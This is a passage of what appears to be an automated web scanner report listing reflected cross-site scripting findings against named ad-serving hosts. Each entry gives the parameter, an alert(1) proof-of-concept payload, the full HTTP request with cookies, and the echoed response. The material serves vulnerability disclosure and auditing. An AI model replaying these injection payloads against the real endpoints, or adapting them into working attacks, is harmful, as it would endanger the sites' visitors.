='480';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuid='451931075376';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='10557095211308836692';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72415a0<script>alert(1)</script>af6008a9ab1';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3V
...[SNIP]...

3.6. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [uid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://480-adver-view.c3metrics.com
Path:	/c3VTabstrct-6-2.php

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload bba11<script>alert(1)</script>c8059b5d2bf was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=bba11<script>alert(1)</script>c8059b5d2bf&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://ibnlive.in.com/generalnewsfeed/news/financial-firms-required-to-beef-up-computer-security/735356.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=451931075376; 480-SM=adver_06-20-2011-20-17-03; 480-VT=advertop100_06-16-2011-18-32-39_15277004981308249159ZZZZadver_06-20-2011-20-17-03_8887292771308601023; SERVERID=s9

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 13:44:53 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_06-20-2011-20-17-03; expires=Sun, 26-Jun-2011 13:44:53 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=advertop100_06-16-2011-18-32-39_15277004981308249159ZZZZadver_06-23-2011-13-44-53_1071086101308836693; expires=Tue, 21-Jun-2016 13:44:53 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_1071086101308836693; expires=Thu, 23-Jun-2011 13:59:53 GMT; path=/; domain=c3metrics.com
Content-Length: 6678
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
S.c3VJSnuid='1071086101308836693';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='bba11<script>alert(1)</script>c8059b5d2bf';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScallurl=this.C3VTcallVar.c3VJScollection[a].C3VJSFindBaseurl(c3VTconsts.c3VJSconst.c3VJS
...[SNIP]...

3.7. http://ad.doubleclick.net/adj/fut.gb.tr/news.Internet [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/fut.gb.tr/news.Internet

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 725eb'-alert(1)-'d73a963d6b0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/fut.gb.tr/news.Internet;kw=UK;kw=security;kw=computing;tile=2;sz=980x250;;gs_cat=NONE;ord=852301204?&725eb'-alert(1)-'d73a963d6b0=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.techradar.com/news/computing/internet/uk-most-paranoid-about-computer-security-suggests-study-969910
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 345
Date: Thu, 23 Jun 2011 13:45:19 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b2f/0/0/%2a/a;44306;0-0;0;23314830;26018-980/250;0/0/0;;~okv=;kw=UK;kw=security;kw=computing;tile=2;sz=980x250;;gs_cat=NONE;;725eb'-alert(1)-'d73a963d6b0=1;~aopt=2/1/96/0;~sscs=%3f">
...[SNIP]...

3.8. http://ad.turn.com/server/pixel.htm [fpid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.turn.com
Path:	/server/pixel.htm

Issue detail

The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd9a6"><script>alert(1)</script>ab4972994f2 was submitted in the fpid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=bd9a6"><script>alert(1)</script>ab4972994f2 HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://ibnlive.in.com/generalnewsfeed/news/financial-firms-required-to-beef-up-computer-security/735356.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=o4ZhYxPJ2Pw5XfvbQhsaFpDfbEnc9w-vODw3bflONElh-L3XcPmT4hHXOQgApIlYYCcoFPzHtthoKoScENuCaeoKEGWRrYa1j0O8IgD5vMnwFS7HtMXofNHrftsH-bKaR7vykJ4G_blnocTkHaMlPW77G4xQCEJUEws-BatYXJ6IYC8WBTQX8bUUIXmPY-LZw3JJMkqx51w1pR2YtuCpq6FZW9ee6pqepxcDrSlSmqIMYGmHJG75FIrenYIGOYR5O0czW-xR8eItR9Et5IZyk-3dtU8NWxmwQveYnMRjYK7u1KunjyAhI4wjE-uujeSVGDu5X63VUZQiL9158oTLi4YKJ8H0IRHnj6n6s75qKvM_F4QDFXNXDASdDuX36Wkzp15bX7OJQXizqFWPuRMtGo3I48fCleB9QRLmssYnqhwVp1d1lcuv8Oi-bAzofc8JKSrpSfruct-wsYLh-MTRC22HhlIXg-C3QmlQPe2jan2qzWIFcW73-ffTz4aBpEcHMJy0LW8k-xOEVdrjWU9Du1zMeHAy7ZZoSm8iv5WlzLijE8Sr5GgLBM0V_efj8wkT0pwQwhdI7QCRTHyjVkbrJq_P48i1E6YSPriW57bBIAv4IzT6zG86PBT5DByM8URH6aMpx3xlY8nTvgssFknIvh_X9bzHYS-B9LdlbAgcLLdD37vgtqknSg2EWl8FZYzTR7vykJ4G_blnocTkHaMlPYcsVEyjwEavPZ1IOQB-k76IYC8WBTQX8bUUIXmPY-LZOAc3GkX-Xd6ueK8RLrApqcNXPoKSnz19gf43sN51hM0MYGmHJG75FIrenYIGOYR5sK2sI9UrBz0jKXQxWnwAHe3dtU8NWxmwQveYnMRjYK5roYtEm1m2ljA5TnK4b-ETzYtUd86s7MhdQdfuW2QJ-O9qBflBAlKfYsj0c9fffeCHkZfYN0i6ORTQwcAoE_bXp15bX7OJQXizqFWPuRMtGst8JIuCgxLilohaEpCojUhvsDM2i9ZkSeodg2n84FubH8xw0gLkNMgYofMuPt-PkO8T0cGKn4uRx4CMmEsBWiKqzWIFcW73-ffTz4aBpEcHFs6L3zNdz5ZjoOzvPQTfb835UBdTu1PnDKNhFUbfz_4bftaK-dcMAPf-7IWagRhOwZr_Z_WRhdQvL8CTs4JYMK_P48i1E6YSPriW57bBIAukpN8NUt-_Qle288Cz3gyRLJfQW9W423bNMd7giheysbXds6tq7dVAQSvAX_f_7sdXQLEl7c5RtdI6fIas1hLmR7vykJ4G_blnocTkHaMlPf6EzPEWOsOXwfj5fQxhr_GIYC8WBTQX8bUUIXmPY-LZhNX08PCC1AA7AyxwLL3zQuBx6dhirOES5Nb1eoO8ppIMYGmHJG75FIrenYIGOYR5vPsApCsV7LwfVDjW_3mDwgxgaYckbvkUit6dggY5hHmRvPUTVUGpkj-QsuiT06jI7d21Tw1bGbBC95icxGNgrvI8sTlfLiUVirVDHB_PLB3B7dLv8mQai9FqZxhT-hpTl-Vx6Wg5mtI-fW_MsrYoi_G937R2K7HfGbS1pD2qdcOnXltfs4lBeLOoVY-5Ey0aGA-3n6D_561g-DmvDpQzUlnrCYWMZMOp1_Zkd_EZ8Vr0wbWdoCX3pOkiK5V0V6EREEPS8RoGZCwLoPdHLH_1_KrNYgVxbvf599PPhoGkRwfnOHjpvtkzSEl4d-wdumAAceRGHz-2NrTvKdg0ajpYMtRTvb1kIdd3t20BSfIvd2lR7INwxHtn1BHnDvA-Z2YBr8_jyLUTphI-uJbntsEgC40HfGMMs5mhycnLkZacVec5BRFaFQeeKtoiQ2ejjL3t_kvLTuGDqhWfDkMq3m37HLQ6_3tKFpdfm7OKds5BK7lHu_KQngb9uWehxOQdoyU9DVTnKf4h_4wFcB-MHxcwQ4hgLxYFNBfxtRQheY9j4tnUR_l5Brxo2KRun1gRg513r3ZIOVck9DhuO6-IqSFo3gxgaYckbvkUit6dggY5hHk7xWvxGLYUnQUrfHnC2Gqe7d21Tw1bGbBC95icxGNgrqXK0KyGesFe6hp6T2h-gtTTHNROdRJkLW60A5ndHmAPhgonwfQhEeePqfqzvmoq8_lBesygiIexbjc4i-o7dvenXltfs4lBeLOoVY-5Ey0a54agTyYUq_bAlM32IeJPP1nrCYWMZMOp1_Zkd_EZ8Vr0wbWdoCX3pOkiK5V0V6ER24q8YARiXvoueVF-B0Y7g6rNYgVxbvf599PPhoGkRwfdcxy6ywBRL0NjuPNLjyQkIkVHFILGNxnKUUZcH3JqRMh7s8KySk9WZWXmyLhGVZrs1C9m3PofcnmLKlVpgqYp9o6yvy84eluGVbohcnU12x7ZGYBjzf2udup-eHNa_Z2l9TAOlxk6MdeH2Q0QN4u8lwEjJzCAh1JYBH_NCxDWLbRgPNRTtLafwg9EA77wPIbJK2DjVNxAKeXIyhPIlCfc2QcZO8j6n47WVoKyeRrwcQGp1RlCeoRdbDS-DCdBrizXyhwoKg_Jo1APlrFxO5Qk18ocKCoPyaNQD5axcTuUJJH99Vdy7-581u2dx9OI_4HSK4Sdj5ZIO--EDaPhCReB0iuEnY-WSDvvhA2j4QkXgSVUeVLhXuLgjvBuZxgQvSw11T9tbDb-gupP-B4n2vxWNdU_bWw2_oLqT_geJ9r8VkGGD6sgfruhLxbvILRkdNlBhg-rIH67oS8W7yC0ZHTZKfRWXpUe2qeTc9JXMrn9VebJJoszGDQ3Eaexwt4cZZnUf20A3lCmjUuR-61VCX-NvU4nZmT5VF5Zn8llrbxzhrIPwEo3vkVRKHPopqx1EXu9w1q2IoQvSKH3wx5RmjqUvcNatiKEL0ih98MeUZo6lP2y8DrZPXMQA47HQ2Q16DsjEvzTmFPT5iAsrcfOLHBZIxL805hT0-YgLK3HzixwWTSa5W4FegvUpGyjvuJ6ISMoqk7YbtQbg4XBUuKMramGKKpO2G7UG4OFwVLijK2phoX8bz27oRd3gSS6KBPjreNNE1kZitqao1cu52aL_QsOTRNZGYramqNXLudmi_0LDk0TWRmK2pqjVy7nZov9Cw4rvuDFraCo_Irvttq09dSPZOg_D4rinflq6mkPppcy6WToPw-K4p35auppD6aXMulk6D8PiuKd-WrqaQ-mlzLphlGpNv9ySx5Y5purEM9X4YcjuFEJGiw-vacCiCpLSdSHI7hRCRosPr2nAogqS0nUhyO4UQkaLD69pwKIKktJ1NCbbhlIiub2GEITxbR40HbQm24ZSIrm9hhCE8W0eNB29dWr6tv75cpLr2rKDGkGO3Qb3R2V5rwcL9Xr_UowWOh0G90dlea8HC_V6_1KMFjodBvdHZXmvBwv1ev9SjBY6EMYtI4wwQkC7G7iE0RNYtRDGLSOMMEJAuxu4hNETWLUQxi0jjDBCQLsbuITRE1i1P36QK_2LIj8IKz8yMZslPduDWDlSILalHR2_729wlJWbg1g5UiC2pR0dv-9vcJSVm4NYOVIgtqUdHb_vb3CUlaget-adSpZ90cEnqTFdoWvEzGF1_8IOlgq7Oe0jPdomO2tcbi2u9EDm-HhlRVfdZU; fc=U63FSbWkuQ-6Ehv_rHNvdi3zAlciDD1979_v8BQ05hrif4ZYhbsuYcnc3E8aiw7N0YGlpSJHEwaZrD9xrQykZRLTM2UWqcEggsPn2JlFm6WKJ47y0SjHASrSoX2-_RWGR8GD8YL2uMyYOovbWSVtT_OjMRX_o6D3TvHXeB0H3IoJPxIPX2Q6BIRFliap-hOlRK2X8EADYMp4JB-33zSWnO8MiwtslG4QC6vJ2mX9tHFSgQ0O9mROJGoCL9gdek9ttRbI5dYkL5pqtEW6ywS8ZDwwSRX2lC4Qe-JwlhlCZWTw_zLWP1yseKkJfFCIGqWZ; rrs=1%7C6%7C9%7C12%7C1002%7C18%7C1008%7C1%7C4%7C7%7C10%7C13%7C1003%7C1006%7C2%7C5%7C1001%7C1004; rds=15146%7C15146%7C15146%7C15146%7C15146%7C15146%7C15138%7C15146%7C15142%7C15146%7C15146%7C15146%7C15146%7C15145%7C15146%7C15146%7C15146%7C15146; rv=1; uid=4325897289836481830; pf=wUs3RJjrnHBGmoPKC2w1BSzahta4gd-h8vP4oQlAWBgStJHO4dSC7tcSjJ5dCIRN8otVVKbFPjeNTxIiX5ySOUqurdpBdA7aDRpJC66X22yIHFm0S0kHxvLP_MYOfXLQq-dHAl-abYU1X5bYp5n9CSBwbmS48Uljm8MNWJG0d45yqi9mVjA02NuqavQ6eQd_y_Nxu2TdlUTz31ahRlm2jPXSJEnzjwmCJ-ww7TyzMnW_D1Ycf85DI0aXnqcS-yYhrNze5mJSmFU_16iWg6qGXaslDVv0CEp6k0oxMtW5frkHxEQfWMRgFYDLU3__ZDn7GKhK_pbP_UBUvvBV4z0YcGVGnrhJgXnNyT8YxkkLqook3V-8aWQ5ogo6xIv_g-tlU41tEj6SOLoKbZtcPAoWvIZNSZlGi5_0oLVgGgqWSLjIumXKNgQi-6kDQjunCLT7fjwUoJhpAG-BIBpu1eL5-lDKNc4L8lxhmJCi0XSQieFhFwq7SaNdz_ocTatUAU-qEFDSOVOmzcXCrTh-KvrBNQnMcpeUOVFqdnEJkJDKTqW5CyjQ9CWSKcOGeQNIGZUPNsclUfoCKs_P08jgwSgJYbcIxoWpLP8kJHirQfhJM1m92s9xXr05DIv8cqx6xYqZz2pyniL4I0AFr11avteCTHP-MKrmQGILwqOPUURxPh_OaB7pgTaF4qWQ2HhJHM7MQ1FATrIPe9fO1W-kVj41FzAInC6SN2fmozOFzLuTgF9cmu2fgg-ptDZq0nhZGPUq7ENa4utBAijkMB8acerWmKUiG3NKxRUIkdkWSlkGWLmKvSfxSVUhBehZqqkXgkvNStUBXiPiubepGWTwbovBGpJUJQLVBqLanOblkHJu9xH3GDUUM_ZOcJx6Ga7Je7zMcY_QS925sh7URWgzYJaPWjRgkXleqqVT1LQZLlwfgGNcyBeVzRUxv3Q7asCZPWvJx5xGZTqtRs2xUNiSflAsSHFST6QiOZR468XMdu_IjTAaJdutfTchePMF9BJE48SVs2eS74sZWCAm9rPc1kIbbk-pKbU4KtSl-ktr55_QkH3ovtrh5jGpi8fiId0xkxWG1vbbopJLM8C9at-8yKvEqAR567tiTDPDC5AioBKZ_aEJX4PLxtPJDTh6LcF4_fx6l369zx79lO56qpsZFi6-Icne4cLOSJ3coSRqSfAxlRzGjU4Tn7VESa-w2mjoF9vwj15O7a79JjYY5qVgXc2osU2kYjIqQf2_6LnQaqKT-Pb0XaBOKdel8lyMk_dn1RYgFGIEDJrpUW62qucYCD2LJczkpLARLMKPKWRScvsz04-jesN4QzQjQFlP0J6VZDJFHmaXa4eb8PMHp0xhQcCR4bqZL9BkxhlgtnxOXWCzQELeIBJUJspLAB50oC31fGkON-rRU7eE4QzN3Cj6YpqHXvt8xLb-TJA3MW3gWM8oadZrihclDcMg24IQ1mssSMoGnSi5oFPpM3C1T95FgaV2FhfNZ-wWSAoC-ekqRlbYKilgrqOhS_hzDUPsZfBJd2FhVACj21yYaTIGE8VBZkwZ0hQ6Ladu7PughH-bIm4y0Ab6nRgUKcGXElGE-_DS4Ricu2NP8QQUwEddIGGXiI0ikX8tIMOHu7ZzFVt755dCSQZs-k9i-tjPDbhaQ0YI__sTf8igRaY5cyCnjyOwVD2OS009W1ujEvgdnOfJu5crBfoqKPISxg4JMc-wfusvOiL66IfoxhRVau6TltYBb7-XChmyRJwYT3SVN8WLd39hZk8Bc5k_8SzK7X_3Bu_DkXEJ1-0bPVbCw9gJGr_B8xDvqoSRWiJ0aXKJcZ-Rm_1IemcOgPxlg_I4GVGQsts3-Widpm2owGjEbtSLL0XOjeWJwuRIJkkBAqJsNNITsh4NZ79vNPuYVunznl4Ru-AlUbhO4WJot6ZQLYMWYK-3VIhf9NOVCTi9EKN0EChMCpt8t79taa2O8z0zAFVDyg3ety8a8X24jJ6sSBHRnGvcfC46N5cRIRjWMuveNQmJnehLSzrzO4mWkXY8sRfEZSRVF-eLcIql8-Bktoud7UrXynkSAhN6akQLaY-eXSAvrbezbiKSwrMJsaQSeTsKGuCQQr2-y5a7Qi8VwRgyzaNjUJGKJsi6dxv2oUpLC8kr0lnKkHXcJR_rGcvm6DgXUkti2dAj3C6gNLghcL1ATT4dfXoT0XCq9YPC5oENmg6G4qCLpkd6bOL8K_8x_ofi-YZIXtSwkZ2h2FTEOB7VAVaX5hOrFfnL1gLyqIqik_zuH70qAJA-PBhbA79851KT4-AG0SCN_FhhxOiLtoiA3m7onhzh-TJc88tEfwDGbxnH_j1h-NtVFTKdRNhtT0fDJE-__QeonnnzZXsc9K80-WU_VLBsdQNA2PYXH3Rff0knxJcVZ7Chz4FJJ_TMv03yL7XPeYtr4s0GKf3t057ZF4_jL2ifoo0t0noToysMQ98IGemf7gcP8sUOs_epJQ8gyIjVMYX2SuE1jSJBqGoTNfCkFA_1FMJLxHxDTLD68RZNW115CcBbPNgZZKRiXKaLKD62rQnfDWK35o0A7w8jrj3wOje0h3VO65HFl2Qkz1aQHw1bkZ4UQ7kl9hQMcyi_uXiusieb9oqny7NzWYCf6XmrNS7dZQ8PQj4xieKYCskpNEszFxoPPk2bpwxxJLKaR6-s3EU26XW92a-msXAhMgRGpU1p6Juquy9ZrCLMz-gm43o_H-Bl7sbzW9GEZ0ngzf92snAnRcT637PYoh9vs8nxEshXyZrKeJEXnSgmaEwKGT0NYjHqeyWBScug8JR8Ogml2rS_8VpwQL7zeGBwWLOtt2X6e5mIpzfBfsaJojQQA8aQFUV499JD3JawQFF-O5bgAetRXnIhw7Q1GQOqAwPZYBAlsXj29aoCtsMnTKiqJ-4FPyvAt7MYGai56hsHZYw1pPFfubGkytCfTIRLVtkmYuONkgCSYgnFnvF5gKPmXiBQ9dWg5UVe5zOlev8xSqT-8JS2EDyiLHISVTcA2XV0Papii_0G4vyX4BB1uK3mZKqFwCB7V_2_YMp2tLu2luQQzSKrFobpGzDPG60qE7Z1BueqeWLTn54P86vtZCdL4Et0GphOd6rTMoWpTj1U1wX22aW3FPU1oQkWEyK98ozmItdcuoDcloFWpq5ZHCojxL_cWf4EwTRa2OYv6xN_c1_3djCz_W53uzQhFTz7d2IZbRiKFFqlaE1XAnxcOp4xiYuYfIzeYiTtzrVIHv7wUzHKILRxITElIfz1Os_Qq07M4F9O_CBoBBTZPqpiN6lRHoduZTv7rwXS_mtQPlV9OlcM3SofjeVvDb839deLUAObQ8GB-e8PtB-b2vXw1XxBOXggLkQ33Mxxv0oPw2IFtoFLcC4UWvoXMOCBLu4d31iv78LZ7orMqeG9dIdYhrW8gVTGc8vc44PtS2IyZUysSPh_4uJu

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4325897289836481830; Domain=.turn.com; Expires=Tue, 20-Dec-2011 13:44:54 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 23 Jun 2011 13:44:54 GMT
Content-Length: 384

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=4325897289836481830&rnd=2362668370259287691&fpid=bd9a6"><script>alert(1)</script>ab4972994f2&nu=n&t=&sp=n&purl=&ctid=1"
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

3.9. http://ad.z5x.net/st [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.z5x.net
Path:	/st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 138b9"-alert(1)-"b6b0f11c8d6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /st?ad_type=ad&ad_size=728x90&section=762900&138b9"-alert(1)-"b6b0f11c8d6=1 HTTP/1.1
Host: ad.z5x.net
Proxy-Connection: keep-alive
Referer: http://ibnlive.in.com/generalnewsfeed/news/financial-firms-required-to-beef-up-computer-security/735356.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 13:44:48 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Thu, 23 Jun 2011 13:44:48 GMT
Pragma: no-cache
Content-Length: 4314
Age: 0
Proxy-Connection: close

/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "ad"; rm_url = "http://ad.z5x.net/imp?138b9"-alert(1)-"b6b0f11c8d6=1&Z=728x90&s=762900&_salt=4278422727";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Arr
...[SNIP]...

3.10. http://data.inskinmedia.com/trackports/rep/base/track.php [callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://data.inskinmedia.com
Path:	/trackports/rep/base/track.php

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 7202e<script>alert(1)</script>95c97a1a193 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /trackports/rep/base/track.php?callback=jsonp13088366658127202e<script>alert(1)</script>95c97a1a193&type=init&section_id=124045&content_type=PAGESKIN&page_url=http%3A%2F%2Fwww.techradar.com%2Fnews%2Fcomputing%2Finternet%2Fuk-most-paranoid-about-computer-security-suggests-study-969910&failed=0&reason= HTTP/1.1
Host: data.inskinmedia.com
Proxy-Connection: keep-alive
Referer: http://www.techradar.com/news/computing/internet/uk-most-paranoid-about-computer-security-suggests-study-969910
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.6.32
Date: Thu, 23 Jun 2011 13:43:47 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Content-Length: 66

jsonp13088366658127202e<script>alert(1)</script>95c97a1a193(null);

3.11. http://data.inskinmedia.com/trackports/rep/base/track.php [type parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://data.inskinmedia.com
Path:	/trackports/rep/base/track.php

Issue detail

The value of the type request parameter is copied into the HTML document as plain text between tags. The payload 4a1e5<script>alert(1)</script>30b1a2cad3f was submitted in the type parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /trackports/rep/base/track.php?callback=jsonp1308836665812&type=init4a1e5<script>alert(1)</script>30b1a2cad3f&section_id=124045&content_type=PAGESKIN&page_url=http%3A%2F%2Fwww.techradar.com%2Fnews%2Fcomputing%2Finternet%2Fuk-most-paranoid-about-computer-security-suggests-study-969910&failed=0&reason= HTTP/1.1
Host: data.inskinmedia.com
Proxy-Connection: keep-alive
Referer: http://www.techradar.com/news/computing/internet/uk-most-paranoid-about-computer-security-suggests-study-969910
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.6.32
Date: Thu, 23 Jun 2011 13:43:57 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Content-Length: 75

Error: type "init4a1e5<script>alert(1)</script>30b1a2cad3f" not recognized.

3.12. http://delivery.steelhousemedia.com/serve [advid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://delivery.steelhousemedia.com
Path:	/serve

Issue detail

The value of the advid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1bc8d"-alert(1)-"8e93928398d was submitted in the advid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /serve?cb=457598401&sh_rid=adserver005:937789&ms=1&aid=6007&cgid=1850&cid=906&guid=d09b7564-e06a-439f-88f1-23754bc64beb&advid=92971bc8d"-alert(1)-"8e93928398d&segid=0&eid=62&pp=2.25&sh_ref=aHR0cDovL2libmxpdmUuaW4uY29tL2dlbmVyYWxuZXdzZmVlZC9uZXdzL2ZpbmFuY2lhbC1maXJtcy1yZXF1aXJlZC10by1iZWVmLXVwLWNvbXB1dGVyLXNlY3VyaXR5LzczNTM1Ni5odG1s&tp=457598401&ck= HTTP/1.1
Host: delivery.steelhousemedia.com
Proxy-Connection: keep-alive
Referer: http://ibnlive.in.com/generalnewsfeed/news/financial-firms-required-to-beef-up-computer-security/735356.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
